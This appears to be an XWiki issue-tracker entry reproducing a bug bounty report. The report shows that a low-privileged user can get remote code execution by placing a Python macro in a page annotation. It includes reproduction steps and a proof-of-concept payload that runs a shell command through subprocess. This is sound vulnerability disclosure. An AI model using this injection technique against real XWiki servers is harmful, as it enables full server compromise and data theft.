Details
-
Bug
-
Resolution: Solved By
-
Blocker
-
2.3 M1
Description
SUBMISSION REFERENCES
- Submission code: XWIKI-XKMFV6XU
- Submission URL: https://www.intigriti.com/auth/dashboard?redirect=/submissions/e95a7ad5-7029-4627-abf0-3e3e3ea0b4ce/XWIKI-XKMFV6XU
RESEARCHER INFORMATION
- Submitter: renniepak
SUBMISSION INFORMATION
- Created at: Tue, 15 Nov 2022 08:09:01 GMT
- Submission status: Archived
REPORT CONTENT
- Severity: Exceptional (9.9)
- Domain: https://intigriti.xwiki.com/ (Url)
- Proof of concept: Hi XWiki team,
I've found a way a regular user can get Remote Code Execution through adding an annotation containing Python code.
-
- Reproduction
1. Login as a regular user
2. Navigate to any content page. For example: https://intigriti.xwiki.com/xwiki/bin/view/Help/Videos/
3. Select a line of text and hit Ctrl+M to add an annotation:
4. Click the `Source` button and add the following code:
```python
python
import subprocess
print(subprocess.check_output("id", shell=True))
/python
```
5. Click `Add Annotation`
6. Append `?viewer=annotations` to the url so that it becomes https://intigriti.xwiki.com/xwiki/bin/view/Help/Videos/?viewer=annotations
-
- Result
Our annotation will execute the suplied code.
{671035}- Impact: Any low privileged user can abuse this to run arbitrary code on the server. Doing so they can completely compromise the application and server and it's data.
- Personal data involved: No
- Endpoint: https://intigriti.xwiki.com/xwiki/bin/view/Help/Videos/
- Type: Remote Code Execution
- Attachments: Screenshot 2022-11-15 090521.png, Screenshot 2022-11-15 090822.png
Attachments
Issue Links
- duplicates
-
XWIKI-20384 Use the new textarea restricted setup in comments
- Closed
- is caused by
-
XWIKI-5033 Commit first version of annotations in the platform
- Closed